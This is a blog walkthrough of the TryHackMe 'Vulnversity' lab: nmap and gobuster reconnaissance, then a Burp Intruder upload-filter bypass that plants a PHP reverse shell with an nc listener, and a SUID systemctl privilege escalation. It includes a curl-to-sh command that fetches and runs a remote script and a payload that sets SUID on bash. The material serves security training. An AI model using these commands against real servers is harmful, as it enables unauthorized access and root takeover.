TryHackMe Vulnversity Walkthrough

Reading Time: 11 minutes

Welcome to the Tryhackme write-up series. Today we going to analyze a room that should be one of the first ones for everyone that starts a journey on Try Hack Me. The room is called Vulnversity. This room focuses on active reconnaissance and the main tools for it, it has tasks related to web application attacks, and lastly, it has a privilege escalation task, that is not that easy as it seems. Let’s get started with the Vulnversity walkthrough.

Room Overview

As this is an easy room that teaches the basics, over 100k users had joined this room, and the room itself is almost 2 years old.

Vulnversity was created 2 years ago, since then 100k users had joined it

Before we dive deeper into the technical details of the tasks, let’s have a look at what they are all about.

Vulnversity has five different tasks

Just like in any other room, the first thing you need to do is to deploy the victim machine.

After that, you may continue to Task no. 2, which focuses on active reconnaissance. In this task, you will have to use the nmap in order to answer the questions. All of the questions are pretty basic and can be answered either by checking the help menu of the nmap, or by analyzing the results of a scan, that was made against the victim.

Task no. 3 asks to find the hidden directories. For this purpose, you are suggested to use the Gobuster.

All the fun begins with task no. 4. Firstly you are asked to bypass the upload restrictions that are set. Secondly, you have to successfully upload the reverse shell, execute it and start the communication with a victim. After that, you will need to find the flag.

As it was mentioned previously, the task no. 5 is a little bit advanced as it asks to escalate the privileges in order to get the flag.

Vulnversity Writeup

As we’ve had briefly discussed what’s waiting for us, we can start solving the tasks.

Task 1 Deploy the machine

The first task is easy as it can be – all you need to do is to start the machine. You can do so by clicking on the green Start Machine button.

You can start the machine by clicking on the Start Machine button

Another thing you have to do is either to start the AttackBox or use the VPN. The AttackBox is a perfect option that gives you a connection with VNC to the Try Hack Me virtual machine. That VM has everything you will need for the task. But here are the bad news, unless you have the Tryhackme subscription, you will be able to deploy it for only an hour a day.

You can start the attacker VM by clicking on Start AttackBox

Alternatively, you might use the VPN and connect with your own machine. But you will have to install the necessary tools by yourself.

If both, attacker and victim VMs are running, let’s proceed to the second task.

Task 2 Reconnaissance

The second task of the Vulnversity is focused on reconnaissance. And the tool you will have to use is the nmap. This is a powerful tool that can provide you a lot of information about the target, however, you must learn to use the correct flags. While scan with some of the flags will give you a lot of information, it might take longer to finish.

Anyway, as this is a beginner challenge, try different flags (also try combining them) to see the difference. But in this case, nmap scan with -A, and -sC flags will give us most of the information we need for the questions.


With these flags, all ports will be scanned with default nmap scripts, and OS and version detection will be executed. The -v flag will show us the results interactively. You might try scanning with the -p- flag, but keep in mind that this scan will check all the ports and will take a lot of time (10+ minutes)

After about 30 seconds, you will get the results.

Results of the nmap scan on Vulnversity host
This gives us enough information to answer the questions.

The second question of the task (the first one does not require any input) asks how many ports there are open. As the scan found ports 21, 22, 139, 445, 3128, and 3333 open, we can state that in total 6 ports are open.

Nmap scan found six open ports

Another question asks what is the version of squid proxy. If you’ve executed a scan with version detection flag, you can see that port 3128 runs Squid 3.5.12.

Port 3128 runs Squid 3.5.12 service
The following question asks about the nmap flag -p-400. In order to answer it, you have to check the nmap manual (nmap -h). It shows that this flag sets what ports should be scanned.

From this, we can see that the flag -p-400 instructs nmap to scan 400 ports.

Flag -p-400 sets nmap to scan for 400 ports

Another question asks what the flag -n will not resolve. Again, nmap manual can help us. We can see that the -n flag sets the nmap to not to do DNS resolution, and the -R is used to do the resolution.

Nmap help menu shows the DNS resolution flags

And the answer to the question is DNS.

Nmap flag -n will not resolve DNS

Another question asks for what OS is the machine running. This is a little bit tricky, as the nmap results shows the following:

Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3.13
OS details: Linux 3.13

You can try submitting the “Linux” as an answer, but unfortunately, it will not be accepted. So we have to look for the clues about OS somewhere else. If you paid attention to the results of 3333 port scan, you can see that Ubuntu is mentioned.

Port 3333 shows that the machine runs Ubuntu

The same is with port 22.

Port 22 shows that the machine runs Ubuntu

So, the answer is Ubuntu. Even though OS detection provided results that are not specific enough, we can find the correct OS in the data that we retrieved during the service detection.

The server runs Ubuntu

And there is one more, the last question that we are going to cover in this Vulnversity walkthrough. Last question of task 2 asks what port the web server is running on. As we already saw that port 3333 has Apache as a server, we can try visiting it.

Bingo! A web page is served by the Apache.

Web server loads us Vuln University website

And the answer to this question is 3333.

Webserver is running on port 3333

If you’ve managed to answer all the questions, let’s proceed to the third task’s explanation in our Vulnversity write up.

Task 3 Locating directories using GoBuster

Now as we already know what ports are open, and what services are running on them, we can continue our recon. Task no. 3 asks to perform a directory brute force attack on the web server. And the GoBuster tool is recommended for this.

If you are using the deployed THM AttackBox it already has the GoBuster. But if you are on your own machine, you can get the GoBuster easily with the following command:

sudo apt-get install gobuster

Now we need a list with directories we will try to find. You can use one of the wordlists provided by the DirBuster. Specifically, you can find it in the /usr/share/wordlists/dirbuster directory.

When you have the dictionary you want to use ready, you can start the GoBuster. While you might try constructing your own command, this works perfectly:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt -u http://YOUR_VICTIM_IP:3333

Gobuster will show that there are five directories:

  • /images
  • /css
  • /js
  • /fonts
  • /internal
Gobuster found five directories on Vulnversity box

And now comes the most interesting part – exploration. After checking the found directories, you will see that the /internal directory has an upload form.

Internal page has upload form

And the answer to the question is “/internal/”.

Internal page has an upload form

Task 4 Compromise the webserver

The goal of this task is to upload the reverse shell and gain access to the server. However, this will not be that straightforward. Vulnversity upload form has validation for the filetypes. So we have to find out what file type is allowed so that we could disguise our reverse shell accordingly.

For the task, we have to configure the proxy. It can be done with the Foxy Proxy plugin in Mozilla Firefox.

Configuring proxy on the browser

After that, let’s run the Burp Suite, go back to the browser and try uploading any file.

File upload request for the Vulnversity upload form

Burp Suite should intercept the request. Now let’s send this request to the Intruder. Then clear all the positions (click on Clear button), and find the part of the request where the filename is set. Add the § symbol after the dot, and after the end of an extension.

Filename is on the 15 line of the request

Task mentions a few extensions – .php, .php3, .php4, .php5, .phtml. Either add them one by one to the Payloads tab of the Burp Suite intruder, or put them into a text file and load the file.

Enter the extensions into the payloads list

NOTE: make sure there is no dot before the extension. Burp Suite encodes the character, and the attack becomes ineffective. A solution to this is to place the marker after the dot and use a wordlist that has no dot. Another way how to solve this problem is to turn off the encoding in settings.

After the configuration, start the attack.

PHTML response length is lower

You can see that the request with phtml payload differs from others. Even though all of the responses returns with 200 status codes, we can observe that the.phtml extension’s response length is different.

And from this, we can see that the .phtml extension is accepted. So, we need to upload our reverse shell as PHTML.

Reverse shells are located in the /usr/share/webshells/php directory. Open the php-reverse-shell.php and set your attack box’s IP address in the 49 line.

PHP reverse shell in the webshells directory
Then save the shell as .phtml file.
Save the file as phtml

Before uploading the shell, we have to start listening for the incoming connections in our attack box. We can do so with the nc -lvnp 1234 command.

Listening for the incoming connection in our attack box
After this, upload the reverse she’ll. If everything went right, you should see the uploaded file in the /internal/uploads directory.
Uploads directory on the Vulnversity page

Click on the uploaded file and check the terminal, where you are listening for the incoming connections. You should see that the connection was established

Connection was established with Vulnversity server
As we gained access, we can finish the Vulnversity walkthrough of task 4 by answering the questions. One of the questions asks what user manages the webserver. The first thing we have to check is what user we are connected as. We can use the whoami command.
Whoami shows that we are www-data user

However, this is not the correct answer. But a quick way to check what other user is on the system, is to go to the home directory. And we can see that there’s a home directory for Bill.

Bill is the user who manages the webserver

So, the answer to the question is “bill”.

Answer to the question about who manages the webserver
Lastly, we can find the flag in the file user.txt, which is in the Bill’s directory.
Flag of the task 4

Submit it and we are done with the Vulnversity walkthrough for task 4.

Submit the flag you found in the user.txt file

Task 5 Privilege Escalation

Task 5 focuses on privilege escalation. And according to the task description provided by TryHackMe, SUID examination will lead to it.

On the first question, there is a hint of how we can search for the SUID files. By running this command find / -user root -perm -4000 -exec ls -ldb {} \; we will get a list of the files that has the SUID set.

File /bin/systemctl stands out from other files

We might see that the /bin/systemctl is on the list. This is interesting and is likely to be vulnerable. If this file looks like any other file for you, do not worry, this comes with experience. After some practicing, you will start to notice the files that normally should not have the SUID set.

The good news is that there are tools that can help. There is a script, called LinPEAS that will check for the privilege escalation. We can’t download it directly to the victim’s machine, but there is a workaround:

  • First of all, download the script to the attacker’s machine: wget
  • Now start the webserver on the attacker’s machine: sudo python -m http.server 801
  • Lastly, download the script from the attacker’s machine, and execute it. Run this command on victim’s machine: curl YOUR_ATTACK_MACHINE_IP:801/ | sh

The script should be executed, and BINGO. We can see that the systemctl is in yellow.

Linpeas scrip found that systemctl can be used for priilege esc

As we know what file does stand out, we can answer the question.

Correct answer is the /bin/systemctl

We do know that the /bin/systemctl might lead to the privilege escalation but how do we exploit it?

There is a list of Unix binaries that can lead to the exploitation of SUID. We can try searching for the systemctl in our case. There is a SUID exploitation for the systemctl. Perfect for our case.

GTFObins has systemctl SUID exploitation

And now we need to modify it a little bit. Replace the ./systemctl to /bin/systemctl in the last two lines. Also, change the command that will be executed (line 4) into the one that is needed for us. As we want to get the flag, instead of “id > /tmp/output” we can execute “cat /root/root.txt > /tmp/output”. The flag will be output into the /tmp directory. The final code looks like this:

echo '[Service]
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF

Execute it in the terminal. If everything went right, it should look like this:

Successfull privilege escalation should look like this

Keep in mind that you might need to press Enter additionally after you’ve pasted and ran the commands.

PRO TIP: if the command is not working, this might be related to the encoding issues of the symbols such as ‘, or “. Try to delete them and rewrite them by hand. Code should work.

If you do want to get access as a root, change the command that will be executed to “chmod +s /bin/bash”. After this execute bash -p in the terminal. Use whoami to check if you are root. If so, have fun.

And now all we need to do is to check the flag:

Flag was output into /tmp/output

And finally, congratulations! If you’ve followed this Vulnversity walkthrough, at this point you probably finished the room.

Vulnversity room was finished successfully


This Tryhackme room is a great way to learn to use the tools that might be used for the penetration testing, and at the same time to gain the basic skills. Eventually, solving the rooms might lead you to the skills needed to pass the OSCP. If you liked this Vulnversity walkthrough, check other rooms of the TryHackMe.

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